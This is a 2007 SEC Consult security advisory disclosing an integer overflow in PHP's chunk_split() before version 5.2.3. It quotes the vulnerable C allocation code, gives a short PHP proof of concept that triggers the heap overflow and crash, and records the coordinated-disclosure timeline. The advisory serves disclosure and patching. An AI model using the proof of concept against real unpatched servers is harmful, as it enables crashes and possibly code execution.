SEC Consult Security Advisory < 20070601-0>
===========================================================================
title: PHP chunk_split() integer overflow
program: PHP
vulnerable version: < 5.2.3
impact: moderate
homepage: www.php.net
found: 2007-05-25
by: Gerhard Wagner / SEC Consult / www.sec-consult.com
===========================================================================
Vendor description:
---------------
PHP is a widely-used general-purpose scripting language that is especially
suited for Web development ...
Vulnerability overview:
---------------
The parameters chunks, srclen and chunklen are used without any check in a
memory allocation statement. Due to a possible integer overflow this can
result in the allocation of a too small buffer which leads to a heap
overflow. This crashes the php process and may allow execution of arbitrary
code.
Vulnerability details:
---------------
In line 1963 the chunk_split function tries to allocate the adequate size
of memory for the result of the function. In case the values chunks and
endlen are bigger than 65534 an integer overflow is triggered and the wrong
size of memory is allocated, which results in a heap overflow.
ext/standard/string.c:
1953 static char *php_chunk_split(char *src, int srclen, char *end,
int endlen, int chunklen, int *destlen)
1954 {
1955 char *dest;
1956 char *p, *q;
1957 int chunks; /* complete chunks! */
1958 int restlen;
1959
1960 chunks = srclen / chunklen;
1961 restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963 dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1), sizeof(char), 0);
1964
1965 for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966 memcpy(q, p, chunklen);
1967 q += chunklen;
1968 memcpy(q, end, endlen);
1969 q += endlen;
1970 p += chunklen;
1971 }
proof of concept:
---------------
<?
$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>
vulnerable versions:
---------------
The version 5.2.3 fixes this security issue. All earlier releases should be
prone to the demonstrated vulnerability.
vendor status:
---------------
vendor notified: 2007-05-29
vendor response: 2007-05-29
patch available: 2007-06-01
coordinated disclosure: 2007-06-01
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Wien
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 15
Mail: research at sec-consult dot com
www.sec-consult.com
EOF Gerhard Wagner / @2007